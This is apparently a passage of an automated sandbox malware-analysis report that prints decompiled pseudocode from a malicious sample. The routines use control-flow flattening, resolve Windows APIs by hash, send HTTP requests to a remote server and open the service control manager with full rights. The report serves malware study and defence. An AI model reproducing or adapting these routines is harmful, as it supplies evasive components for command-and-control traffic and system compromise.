                                                        • Instruction Fuzzy Hash: 0E51E3B170420147CA24BFA9D855A7F3696AB90F0AF000D2FF655C7392EA7DCF05839A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 58%
                                                        			E004853D0(void* __ebx, void* __ebp) {
                                                        				signed char _v2;
                                                        				signed int _v276;
                                                        				signed int _v280;
                                                        				char _v284;
                                                        				signed short _v320;
                                                        				void* _t8;
                                                        				intOrPtr* _t13;
                                                        				intOrPtr* _t16;
                                                        				void* _t22;
                                                        				void* _t31;
                                                        				void* _t32;
                                                        				void* _t35;
                                                        
                                                        				_t32 = __ebp;
                                                        				_t22 = __ebx;
                                                        				_t8 = 0x375d42ff;
                                                        				_t31 = 0;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t35 = _t8 - 0x2a3ce5bf;
                                                        						if(_t35 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t35 == 0) {
                                                        							_t13 =  *0x48e48c;
                                                        							if(_t13 == 0) {
                                                        								_t13 = E00483E60(_t22, E00483F00(0x9bab0b12), 0xd293227f, _t32);
                                                        								 *0x48e48c = _t13;
                                                        							}
                                                        							 *_t13( &_v320); // executed
                                                        							_t8 = 0x369c73bd;
                                                        							continue;
                                                        						} else {
                                                        							if(_t8 == 0x4168e76) {
                                                        								_t16 =  *0x48db60;
                                                        								_v284 = 0x11c;
                                                        								if(_t16 == 0) {
                                                        									_t16 = E00483E60(_t22, E00483F00(0xc6fbcd74), 0x1f37d559, _t32);
                                                        									 *0x48db60 = _t16;
                                                        								}
                                                        								 *_t16( &_v284);
                                                        								_t8 = 0x2a3ce5bf;
                                                        								continue;
                                                        							} else {
                                                        								if(_t8 == 0x13274375) {
                                                        									return (_v320 & 0x0000ffff) + _t31;
                                                        								} else {
                                                        									if(_t8 != 0x1c93af8c) {
                                                        										goto L17;
                                                        									} else {
                                                        										_t31 = _t31 + _v280 * 0x3e8;
                                                        										_t8 = 0x2cb8004a;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L22:
                                                        					}
                                                        					if(_t8 == 0x2cb8004a) {
                                                        						_t31 = _t31 + _v276 * 0x64;
                                                        						_t8 = 0x13274375;
                                                        						goto L1;
                                                        					} else {
                                                        						if(_t8 == 0x369c73bd) {
                                                        							_t31 = _t31 + (_v2 & 0x000000ff) * 0x186a0;
                                                        							_t8 = 0x1c93af8c;
                                                        							goto L1;
                                                        						} else {
                                                        							if(_t8 != 0x375d42ff) {
                                                        								goto L17;
                                                        							} else {
                                                        								_t8 = 0x4168e76;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L22;
                                                        					L17:
                                                        				} while (_t8 != 0x38a43d91);
                                                        				return _t31;
                                                        				goto L22;
                                                        			}















                                                        0x004853d0
                                                        0x004853d0
                                                        0x004853d6
                                                        0x004853dc
                                                        0x004853dc
                                                        0x004853e0
                                                        0x004853e0
                                                        0x004853e0
                                                        0x004853e0
                                                        0x004853e5
                                                        0x00000000
                                                        0x00000000
                                                        0x004853eb
                                                        0x00485455
                                                        0x0048545c
                                                        0x0048546f
                                                        0x00485474
                                                        0x00485474
                                                        0x0048547e
                                                        0x00485480
                                                        0x00000000
                                                        0x004853ed
                                                        0x004853f2
                                                        0x0048541b
                                                        0x00485420
                                                        0x0048542a
                                                        0x0048543d
                                                        0x00485442
                                                        0x00485442
                                                        0x0048544c
                                                        0x0048544e
                                                        0x00000000
                                                        0x004853f4
                                                        0x004853f9
                                                        0x004854f7
                                                        0x004853ff
                                                        0x00485404
                                                        0x00000000
                                                        0x0048540a
                                                        0x00485412
                                                        0x00485414
                                                        0x00000000
                                                        0x00485414
                                                        0x00485404
                                                        0x004853f9
                                                        0x004853f2
                                                        0x00000000
                                                        0x004853eb
                                                        0x0048548f
                                                        0x004854dd
                                                        0x004854df
                                                        0x00000000
                                                        0x00485491
                                                        0x00485496
                                                        0x004854cc
                                                        0x004854ce
                                                        0x00000000
                                                        0x00485498
                                                        0x0048549d
                                                        0x00000000
                                                        0x0048549f
                                                        0x0048549f
                                                        0x00000000
                                                        0x0048549f
                                                        0x0048549d
                                                        0x00485496
                                                        0x00000000
                                                        0x004854a9
                                                        0x004854a9
                                                        0x004854bd
                                                        0x00000000

                                                        APIs
                                                        • GetNativeSystemInfo.KERNEL32(3251FEFE,3251FEFE), ref: 0048547E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InfoNativeSystem
                                                        • String ID:
                                                        • API String ID: 1721193555-0
                                                        • Opcode ID: 9ddd1764e9654dc3bcc0910e7aea15875e2326ebfa10e29547a1a470dee9bdd9
                                                        • Instruction ID: fabd7a4596244dca721dc36dfbbad7b6272af3388ebd332e1799a70b2198a21d
                                                        • Opcode Fuzzy Hash: 9ddd1764e9654dc3bcc0910e7aea15875e2326ebfa10e29547a1a470dee9bdd9
                                                        • Instruction Fuzzy Hash: B8210330E0461087C728BA6ED88127F62D51794B89F940E1BF94AD7360EA3CCD81978F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 26 482be0-482c16 27 482c1a-482c1e 26->27 28 482c20-482c26 27->28 29 482c2c 28->29 30 482e60-482e66 28->30 33 482c32-482c38 29->33 34 482e56-482e5b 29->34 31 482e6c 30->31 32 482f34-482f3a 30->32 39 482f0d-482f26 call 482980 31->39 40 482e72-482e78 31->40 35 482f79-482f7b 32->35 36 482f3c-482f42 32->36 37 482d1a-482d20 33->37 38 482c3e 33->38 34->28 47 482f7d-482f83 35->47 48 482f85-482f87 35->48 41 482f48-482f4f 36->41 42 482ca2-482ca8 36->42 45 482d9e-482dad 37->45 46 482d22-482d28 37->46 43 482fcf-482fd6 38->43 44 482c44-482c4a 38->44 71 482f2a-482f2f 39->71 50 482e7a-482e80 40->50 51 482edc-482ee3 40->51 52 482f6c-482f74 41->52 53 482f51-482f67 call 483f00 call 483e60 41->53 42->28 63 482cae-482cb9 42->63 56 482fd8-482fee call 483f00 call 483e60 43->56 57 482ff3-483004 43->57 54 482cba-482cc9 44->54 55 482c4c-482c52 44->55 61 482dca-482dd5 45->61 62 482daf-482dc5 call 483f00 call 483e60 45->62 46->42 60 482d2e-482d30 46->60 64 482f89-482f90 47->64 48->64 50->42 66 482e86-482e8d 50->66 58 482f00-482f08 InternetCloseHandle 51->58 59 482ee5-482efb call 483f00 call 483e60 51->59 52->28 53->52 75 482ccb-482ce1 call 483f00 call 483e60 54->75 76 482ce6-482cfc 54->76 55->42 73 482c54-482c5b 55->73 56->57 58->28 59->58 69 482d32-482d42 call 4834c0 60->69 70 482d44 60->70 98 482df2-482e00 61->98 99 482dd7-482ded call 483f00 call 483e60 61->99 62->61 77 482fad-482fca HttpSendRequestW 64->77 78 482f92-482fa8 call 483f00 call 483e60 64->78 79 482eaa-482ed7 InternetConnectW 66->79 80 482e8f-482ea5 call 483f00 call 483e60 66->80 86 482d48-482d4f 69->86 70->86 71->28 88 482c78-482c9d InternetOpenW call 484220 73->88 89 482c5d-482c73 call 483f00 call 483e60 73->89 75->76 76->71 114 482d02-482d0a 76->114 77->27 78->77 79->28 80->79 104 482d6c-482d99 call 483460 86->104 105 482d51-482d67 call 483f00 call 483e60 86->105 88->42 89->88 131 482e4c-482e51 98->131 132 482e02-482e09 98->132 99->98 104->28 105->104 114->71 125 482d10-482d15 114->125 125->28 131->28 137 482e0b-482e21 call 483f00 call 483e60 132->137 138 482e26-482e32 ObtainUserAgentString 132->138 137->138 142 482e34-482e41 call 4856f0 138->142 143 482e45-482e47 call 484220 138->143 142->143 143->131
                                                        C-Code - Quality: 76%
                                                        			E00482BE0(WCHAR* __ecx, short __edx, long _a4, WCHAR* _a8, void* _a12, intOrPtr _a16) {
                                                        				WCHAR* _v4;
                                                        				short _v8;
                                                        				char _v12;
                                                        				char _v16;
                                                        				void* _v20;
                                                        				WCHAR* _v24;
                                                        				WCHAR* _v28;
                                                        				void* _v32;
                                                        				WCHAR* _v36;
                                                        				void* _v40;
                                                        				intOrPtr _v44;
                                                        				void* _v52;
                                                        				intOrPtr _v56;
                                                        				intOrPtr _v60;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				signed int _t37;
                                                        				void* _t38;
                                                        				void* _t40;
                                                        				void* _t43;
                                                        				void* _t48;
                                                        				void* _t52;
                                                        				void* _t53;
                                                        				void* _t55;
                                                        				void* _t58;
                                                        				void* _t65;
                                                        				void* _t76;
                                                        				void* _t77;
                                                        				intOrPtr _t79;
                                                        				void* _t85;
                                                        				void* _t114;
                                                        				void* _t133;
                                                        				void* _t134;
                                                        				void* _t135;
                                                        				long _t136;
                                                        				void* _t141;
                                                        				void* _t142;
                                                        				WCHAR* _t143;
                                                        				void* _t146;
                                                        				void** _t147;
                                                        				void* _t150;
                                                        				void* _t151;
                                                        
                                                        				_t147 =  &_v40;
                                                        				_t146 = _a12;
                                                        				_v4 = __ecx;
                                                        				_t135 = 0x312c4ad9;
                                                        				_t85 = _v4;
                                                        				_v8 = __edx;
                                                        				_v36 = 0;
                                                        				_v24 = 0;
                                                        				_v28 = 0;
                                                        				_v40 = 0;
                                                        				while(1) {
                                                        					L1:
                                                        					_t133 = _v20;
                                                        					goto L2;
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t150 = _t135 - 0x312c4ad9;
                                                        							if(_t150 > 0) {
                                                        								goto L38;
                                                        							}
                                                        							L3:
                                                        							if(_t150 == 0) {
                                                        								_t135 = 0x22ee02e8;
                                                        								continue;
                                                        							} else {
                                                        								_t151 = _t135 - 0x1714460e;
                                                        								if(_t151 > 0) {
                                                        									__eflags = _t135 - 0x22ee02e8;
                                                        									if(_t135 == 0x22ee02e8) {
                                                        										_t38 =  *0x48e494;
                                                        										_v24 = 0x200;
                                                        										__eflags = _t38;
                                                        										if(_t38 == 0) {
                                                        											_t38 = E00483E60(_t85, E00483F00(0x9bab0b12), 0x7facde30, _t146);
                                                        											 *0x48e494 = _t38;
                                                        										}
                                                        										_t141 =  *_t38();
                                                        										_t40 =  *0x48dd18;
                                                        										__eflags = _t40;
                                                        										if(_t40 == 0) {
                                                        											_t40 = E00483E60(_t85, E00483F00(0x9bab0b12), 0x9ff0609c, _t146);
                                                        											 *0x48dd18 = _t40;
                                                        										}
                                                        										_t142 =  *_t40(_t141, 8, 0x200);
                                                        										__eflags = _t142;
                                                        										if(_t142 != 0) {
                                                        											_t76 =  *0x48e2fc; // 0x762f49e0
                                                        											__eflags = _t76;
                                                        											if(_t76 == 0) {
                                                        												_t76 = E00483E60(_t85, E00483F00(0x705b7853), 0xa7b8a7b3, _t146);
                                                        												 *0x48e2fc = _t76;
                                                        											}
                                                        											_t77 =  *_t76(0, _t142,  &_v36); // executed
                                                        											__eflags = _t77;
                                                        											if(_t77 == 0) {
                                                        												_t79 = E004856F0(_t142, _t146);
                                                        												_t147 = _t147 - 8 + 8;
                                                        												_v60 = _t79;
                                                        											}
                                                        											E00484220(_t85, _t142);
                                                        										}
                                                        										_t135 = 0x3804105;
                                                        										continue;
                                                        									} else {
                                                        										__eflags = _t135 - 0x2bddac0a;
                                                        										if(_t135 != 0x2bddac0a) {
                                                        											break;
                                                        										} else {
                                                        											__eflags = _t146;
                                                        											if(_t146 == 0) {
                                                        												_t143 = _v28;
                                                        											} else {
                                                        												_t143 = E004834C0(0x48d210);
                                                        												_v28 = _t143;
                                                        											}
                                                        											_t43 =  *0x48dd88;
                                                        											__eflags = _t43;
                                                        											if(_t43 == 0) {
                                                        												_t43 = E00483E60(_t85, E00483F00(0xb37bd66), 0xb7e598cf, _t146);
                                                        												 *0x48dd88 = _t43;
                                                        											}
                                                        											_t85 =  *_t43(_t133, _t143, _a4, 0, 0, 0, 0x844cc300, 0);
                                                        											E00483460(_t143);
                                                        											__eflags = _t85;
                                                        											_t135 =  !=  ? 0x399ad3d8 : 0x3b13624a;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								} else {
                                                        									if(_t151 == 0) {
                                                        										_t48 =  *0x48e258;
                                                        										__eflags = _t48;
                                                        										if(_t48 == 0) {
                                                        											_t48 = E00483E60(_t85, E00483F00(0xb37bd66), 0x1fa1918a, _t146);
                                                        											 *0x48e258 = _t48;
                                                        										}
                                                        										 *_t48(_v32);
                                                        										return _v44;
                                                        									} else {
                                                        										if(_t135 == 0x161d514) {
                                                        											_t52 =  *0x48e1e8; // 0x0
                                                        											_v16 = 4;
                                                        											__eflags = _t52;
                                                        											if(_t52 == 0) {
                                                        												_t52 = E00483E60(_t85, E00483F00(0xb37bd66), 0x30c1111c, _t146);
                                                        												 *0x48e1e8 = _t52;
                                                        											}
                                                        											_t53 =  *_t52(_t85, 0x20000013,  &_v12,  &_v16, 0);
                                                        											__eflags = _t53;
                                                        											if(_t53 == 0) {
                                                        												L49:
                                                        												_t135 = 0x31d265c4;
                                                        											} else {
                                                        												__eflags = _v32 - 0xc8;
                                                        												if(_v32 != 0xc8) {
                                                        													goto L49;
                                                        												} else {
                                                        													_t135 = 0x3733f1d1;
                                                        													while(1) {
                                                        														L2:
                                                        														_t150 = _t135 - 0x312c4ad9;
                                                        														if(_t150 > 0) {
                                                        															goto L38;
                                                        														}
                                                        														goto L3;
                                                        													}
                                                        													goto L38;
                                                        												}
                                                        											}
                                                        											continue;
                                                        										} else {
                                                        											if(_t135 == 0x3804105) {
                                                        												if( *0x48dcdc == 0) {
                                                        													 *0x48dcdc = E00483E60(_t85, E00483F00(0xb37bd66), 0xb1cc2959, _t146);
                                                        												}
                                                        												_t55 = InternetOpenW(_v36, 0, 0, 0, 0); // executed
                                                        												_v52 = _t55;
                                                        												_t135 =  !=  ? 0x34cdf7bf : 0x290e05a1;
                                                        												E00484220(_t85, _v56);
                                                        											}
                                                        											break;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L64:
                                                        							L38:
                                                        							__eflags = _t135 - 0x3733f1d1;
                                                        							if(__eflags > 0) {
                                                        								__eflags = _t135 - 0x399ad3d8;
                                                        								if(_t135 == 0x399ad3d8) {
                                                        									__eflags = _t146;
                                                        									if(_t146 == 0) {
                                                        										_t136 = 0;
                                                        										_t134 = 0;
                                                        										__eflags = 0;
                                                        									} else {
                                                        										_t136 = _a4;
                                                        										_t134 =  *_t146;
                                                        									}
                                                        									__eflags =  *0x48dcb8;
                                                        									if( *0x48dcb8 == 0) {
                                                        										 *0x48dcb8 = E00483E60(_t85, E00483F00(0xb37bd66), 0x6efcb66d, _t146);
                                                        									}
                                                        									_t37 = HttpSendRequestW(_t85, _a8, 0xffffffff, _t134, _t136); // executed
                                                        									asm("sbb esi, esi");
                                                        									_t135 = ( ~_t37 & 0xcf8f6f50) + 0x31d265c4;
                                                        									goto L1;
                                                        								} else {
                                                        									__eflags = _t135 - 0x3b13624a;
                                                        									if(_t135 != 0x3b13624a) {
                                                        										break;
                                                        									} else {
                                                        										_t58 =  *0x48e258;
                                                        										__eflags = _t58;
                                                        										if(_t58 == 0) {
                                                        											_t58 = E00483E60(_t85, E00483F00(0xb37bd66), 0x1fa1918a, _t146);
                                                        											 *0x48e258 = _t58;
                                                        										}
                                                        										 *_t58(_t133);
                                                        										_t135 = 0x1714460e;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							} else {
                                                        								if(__eflags == 0) {
                                                        									__eflags = E00482980(_t85, _a16);
                                                        									_t114 =  !=  ? 1 : _v40;
                                                        									__eflags = _t114;
                                                        									_v40 = _t114;
                                                        									goto L49;
                                                        								} else {
                                                        									__eflags = _t135 - 0x31d265c4;
                                                        									if(_t135 == 0x31d265c4) {
                                                        										__eflags =  *0x48e258;
                                                        										if( *0x48e258 == 0) {
                                                        											 *0x48e258 = E00483E60(_t85, E00483F00(0xb37bd66), 0x1fa1918a, _t146);
                                                        										}
                                                        										InternetCloseHandle(_t85); // executed
                                                        										_t135 = 0x3b13624a;
                                                        										continue;
                                                        									} else {
                                                        										__eflags = _t135 - 0x34cdf7bf;
                                                        										if(_t135 != 0x34cdf7bf) {
                                                        											break;
                                                        										} else {
                                                        											__eflags =  *0x48dfd0;
                                                        											if( *0x48dfd0 == 0) {
                                                        												 *0x48dfd0 = E00483E60(_t85, E00483F00(0xb37bd66), 0x3e17dfbb, _t146);
                                                        											}
                                                        											_t65 = InternetConnectW(_v32, _v4, _v8, 0, 0, 3, 0, 0); // executed
                                                        											_t133 = _t65;
                                                        											__eflags = _t133;
                                                        											_v52 = _t133;
                                                        											_t135 =  !=  ? 0x2bddac0a : 0x1714460e;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							goto L64;
                                                        						}
                                                        					} while (_t135 != 0x290e05a1);
                                                        					return _v40;
                                                        					goto L64;
                                                        				}
                                                        			}













































                                                        0x00482be0
                                                        0x00482be5
                                                        0x00482bec
                                                        0x00482bf0
                                                        0x00482bf5
                                                        0x00482bfa
                                                        0x00482bfe
                                                        0x00482c06
                                                        0x00482c0e
                                                        0x00482c16
                                                        0x00482c1a
                                                        0x00482c1a
                                                        0x00482c1a
                                                        0x00482c1a
                                                        0x00482c20
                                                        0x00482c20
                                                        0x00482c20
                                                        0x00482c20
                                                        0x00482c26
                                                        0x00000000
                                                        0x00000000
                                                        0x00482c2c
                                                        0x00482c2c
                                                        0x00482e56
                                                        0x00000000
                                                        0x00482c32
                                                        0x00482c32
                                                        0x00482c38
                                                        0x00482d1a
                                                        0x00482d20
                                                        0x00482d9e
                                                        0x00482da3
                                                        0x00482dab
                                                        0x00482dad
                                                        0x00482dc0
                                                        0x00482dc5
                                                        0x00482dc5
                                                        0x00482dcc
                                                        0x00482dce
                                                        0x00482dd3
                                                        0x00482dd5
                                                        0x00482de8
                                                        0x00482ded
                                                        0x00482ded
                                                        0x00482dfc
                                                        0x00482dfe
                                                        0x00482e00
                                                        0x00482e02
                                                        0x00482e07
                                                        0x00482e09
                                                        0x00482e1c
                                                        0x00482e21
                                                        0x00482e21
                                                        0x00482e2e
                                                        0x00482e30
                                                        0x00482e32
                                                        0x00482e39
                                                        0x00482e3e
                                                        0x00482e41
                                                        0x00482e41
                                                        0x00482e47
                                                        0x00482e47
                                                        0x00482e4c
                                                        0x00000000
                                                        0x00482d22
                                                        0x00482d22
                                                        0x00482d28
                                                        0x00000000
                                                        0x00482d2e
                                                        0x00482d2e
                                                        0x00482d30
                                                        0x00482d44
                                                        0x00482d32
                                                        0x00482d3c
                                                        0x00482d3e
                                                        0x00482d3e
                                                        0x00482d48
                                                        0x00482d4d
                                                        0x00482d4f
                                                        0x00482d62
                                                        0x00482d67
                                                        0x00482d67
                                                        0x00482d83
                                                        0x00482d85
                                                        0x00482d8a
                                                        0x00482d96
                                                        0x00000000
                                                        0x00482d96
                                                        0x00482d28
                                                        0x00482c3e
                                                        0x00482c3e
                                                        0x00482fcf
                                                        0x00482fd4
                                                        0x00482fd6
                                                        0x00482fe9
                                                        0x00482fee
                                                        0x00482fee
                                                        0x00482ff7
                                                        0x00483004
                                                        0x00482c44
                                                        0x00482c4a
                                                        0x00482cba
                                                        0x00482cbf
                                                        0x00482cc7
                                                        0x00482cc9
                                                        0x00482cdc
                                                        0x00482ce1
                                                        0x00482ce1
                                                        0x00482cf8
                                                        0x00482cfa
                                                        0x00482cfc
                                                        0x00482f2a
                                                        0x00482f2a
                                                        0x00482d02
                                                        0x00482d02
                                                        0x00482d0a
                                                        0x00000000
                                                        0x00482d10
                                                        0x00482d10
                                                        0x00482c20
                                                        0x00482c20
                                                        0x00482c20
                                                        0x00482c26
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00482c26
                                                        0x00000000
                                                        0x00482c20
                                                        0x00482d0a
                                                        0x00000000
                                                        0x00482c4c
                                                        0x00482c52
                                                        0x00482c5b
                                                        0x00482c73
                                                        0x00482c73
                                                        0x00482c84
                                                        0x00482c8c
                                                        0x00482c9a
                                                        0x00482c9d
                                                        0x00482c9d
                                                        0x00000000
                                                        0x00482c52
                                                        0x00482c4a
                                                        0x00482c3e
                                                        0x00482c38
                                                        0x00000000
                                                        0x00482e60
                                                        0x00482e60
                                                        0x00482e66
                                                        0x00482f34
                                                        0x00482f3a
                                                        0x00482f79
                                                        0x00482f7b
                                                        0x00482f85
                                                        0x00482f87
                                                        0x00482f87
                                                        0x00482f7d
                                                        0x00482f7d
                                                        0x00482f80
                                                        0x00482f80
                                                        0x00482f8e
                                                        0x00482f90
                                                        0x00482fa8
                                                        0x00482fa8
                                                        0x00482fb6
                                                        0x00482fbc
                                                        0x00482fc4
                                                        0x00000000
                                                        0x00482f3c
                                                        0x00482f3c
                                                        0x00482f42
                                                        0x00000000
                                                        0x00482f48
                                                        0x00482f48
                                                        0x00482f4d
                                                        0x00482f4f
                                                        0x00482f62
                                                        0x00482f67
                                                        0x00482f67
                                                        0x00482f6d
                                                        0x00482f6f
                                                        0x00000000
                                                        0x00482f6f
                                                        0x00482f42
                                                        0x00482e6c
                                                        0x00482e6c
                                                        0x00482f1c
                                                        0x00482f23
                                                        0x00482f23
                                                        0x00482f26
                                                        0x00000000
                                                        0x00482e72
                                                        0x00482e72
                                                        0x00482e78
                                                        0x00482ee1
                                                        0x00482ee3
                                                        0x00482efb
                                                        0x00482efb
                                                        0x00482f01
                                                        0x00482f03
                                                        0x00000000
                                                        0x00482e7a
                                                        0x00482e7a
                                                        0x00482e80
                                                        0x00000000
                                                        0x00482e86
                                                        0x00482e8b
                                                        0x00482e8d
                                                        0x00482ea5
                                                        0x00482ea5
                                                        0x00482ec0
                                                        0x00482ec2
                                                        0x00482ec9
                                                        0x00482ecb
                                                        0x00482ed4
                                                        0x00000000
                                                        0x00482ed4
                                                        0x00482e80
                                                        0x00482e78
                                                        0x00482e6c
                                                        0x00000000
                                                        0x00482e66
                                                        0x00482ca2
                                                        0x00482cb9
                                                        0x00000000
                                                        0x00482cb9

                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00482C84
                                                        • ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 00482E2E
                                                        • InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00482EC0
                                                        • InternetCloseHandle.WININET(?), ref: 00482F01
                                                        • HttpSendRequestW.WININET(?,?,000000FF,00000000,00000000), ref: 00482FB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2335374791.0000000000481000.00000020.00000001.sdmp, Offset: 00480000, based on PE: true
                                                        • Associated: 0000000F.00000002.2335370463.0000000000480000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335386868.000000000048D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000F.00000002.2335391948.000000000048F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_480000_wlanui.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
                                                        • String ID: Sx[p$I/v
                                                        • API String ID: 1741791824-1179412207
                                                        • Opcode ID: e602f0ed812b79775b022efdc11e064665e823226063de9795772083e8590489
                                                        • Instruction ID: 6550633e0aff5ce473f7c16a6300e5783e856b01c2b2c69dc1a77301193801d5
                                                        • Opcode Fuzzy Hash: e602f0ed812b79775b022efdc11e064665e823226063de9795772083e8590489
                                                        • Instruction Fuzzy Hash: CEA1C131A042115BDB20BF698D50B3F76E5AB94B58F100C2FFA55DB390EBB89D01978E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 150 489860-489878 151 489880-489885 150->151 152 48988b 151->152 153 4899e2-4899e7 151->153 156 48998e-489995 152->156 157 489891-489896 152->157 154 4899ed 153->154 155 489ae3-489ae8 153->155 158 489a73-489a7a 154->158 159 4899f3-4899f8 154->159 164 489aea-489aef 155->164 165 489b02-489b09 155->165 160 4899b2-4899c1 OpenSCManagerW 156->160 161 489997-4899ad call 483f00 call 483e60 156->161 162 48989c 157->162 163 489936-48993b 157->163 171 489a7c-489a92 call 483f00 call 483e60 158->171 172 489a97-489aa2 158->172 168 4899fa-4899ff 159->168 169 489a42-489a49 159->169 173 4899d8-4899dd 160->173 174 4899c3-4899d3 160->174 161->160 175 4898a2-4898a7 162->175 176 489927-489931 call 487c60 162->176 163->164 177 489941-489949 163->177 164->151 178 489af5-489b01 164->178 166 489b0b-489b21 call 483f00 call 483e60 165->166 167 489b26-489b44 SHGetFolderPathW call 483040 165->167 166->167 193 489b49 167->193 168->164 180 489a05-489a3d 168->180 181 489a4b-489a61 call 483f00 call 483e60 169->181 182 489a66-489a6e CloseServiceHandle 169->182 171->172 207 489abf-489ad0 172->207 208 489aa4-489aba call 483f00 call 483e60 172->208 173->151 174->151 189 4898a9-4898ae 175->189 190 489905-489922 175->190 176->151 186 489969-489989 SHGetFolderPathW 177->186 187 48994b-489963 call 483f00 call 483e60 177->187 180->151 181->182 182->151 186->151 187->186 189->164 199 4898b4-4898bb 189->199 190->151 204 489b4c-489b58 193->204 200 4898d8-489900 call 483d00 199->200 201 4898bd-4898d3 call 483f00 call 483e60 199->201 200->151 201->200 207->204 225 489ad2-489ade 207->225 208->207 225->151
                                                        C-Code - Quality: 73%
                                                        			E00489860() {
                                                        				char _v524;
                                                        				unsigned int _v528;
                                                        				char _v536;
                                                        				void* _v544;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t28;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t37;
                                                        				void* _t39;
                                                        				void* _t40;
                                                        				void* _t47;
                                                        				void* _t49;
                                                        				void* _t50;
                                                        				void* _t53;
                                                        				void* _t56;
                                                        				intOrPtr* _t60;
                                                        				intOrPtr _t62;
                                                        				void* _t64;
                                                        				void* _t69;
                                                        				void* _t72;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				intOrPtr _t94;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        
                                                        				_t64 = 0;
                                                        				_t28 = 0x29f9e503;
                                                        				_t92 = _v528;
                                                        				_t2 = _t64 + 1; // 0x1
                                                        				_t94 = _t2;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t97 = _t28 - 0x13fee53b;
                                                        						if(_t97 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t97 == 0) {
                                                        							__eflags =  *0x48e310;
                                                        							if( *0x48e310 == 0) {
                                                        								 *0x48e310 = E00483E60(_t64, E00483F00(0x26f5757c), 0x9ba7cd1, _t94);
                                                        							}
                                                        							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                        							_t92 = _t49;
                                                        							__eflags = _t92;
                                                        							if(_t92 == 0) {
                                                        								_t28 = 0x23c48583;
                                                        							} else {
                                                        								_t50 =  *0x48e54c; // 0x2ce0a8
                                                        								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
                                                        								_t28 = 0xc471eb;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							_t98 = _t28 - 0x9835f84;
                                                        							if(_t98 > 0) {
                                                        								__eflags = _t28 - 0xc0f0991;
                                                        								if(_t28 != 0xc0f0991) {
                                                        									goto L36;
                                                        								} else {
                                                        									_t69 =  *0x48dbd8;
                                                        									__eflags = _t69;
                                                        									if(_t69 == 0) {
                                                        										_t69 = E00483E60(_t64, E00483F00(0xd9518805), 0x141622d6, _t94);
                                                        										 *0x48dbd8 = _t69;
                                                        									}
                                                        									_t53 =  *0x48e54c; // 0x2ce0a8
                                                        									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
                                                        									__eflags = _t56;
                                                        									_t28 = 0x9835f84;
                                                        									_t64 =  ==  ? _t94 : _t64;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t98 == 0) {
                                                        									E00487C60(_t94);
                                                        									_t28 = 0x6addd5c;
                                                        									continue;
                                                        								} else {
                                                        									if(_t28 == 0xc471eb) {
                                                        										_v528 = 0xc1a3;
                                                        										_t28 = 0x179ed98e;
                                                        										_v528 = _v528 + 0xffff1ad7;
                                                        										_v528 = _v528 ^ 0xffffdc53;
                                                        										continue;
                                                        									} else {
                                                        										if(_t28 != 0x6addd5c) {
                                                        											goto L36;
                                                        										} else {
                                                        											_t60 =  *0x48e3f4;
                                                        											if(_t60 == 0) {
                                                        												_t60 = E00483E60(_t64, E00483F00(0x9bab0b12), 0x7dc9b9bb, _t94);
                                                        												 *0x48e3f4 = _t60;
                                                        											}
                                                        											 *_t60(0,  &_v524, 0x104);
                                                        											_t62 = E00483D00( &_v536);
                                                        											_t72 =  *0x48e54c; // 0x2ce0a8
                                                        											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
                                                        											_t28 = 0x39ea8110;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L42:
                                                        					}
                                                        					__eflags = _t28 - 0x29f9e503;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t28 - 0x39ea8110;
                                                        						if(_t28 == 0x39ea8110) {
                                                        							_t29 =  *0x48dbd8;
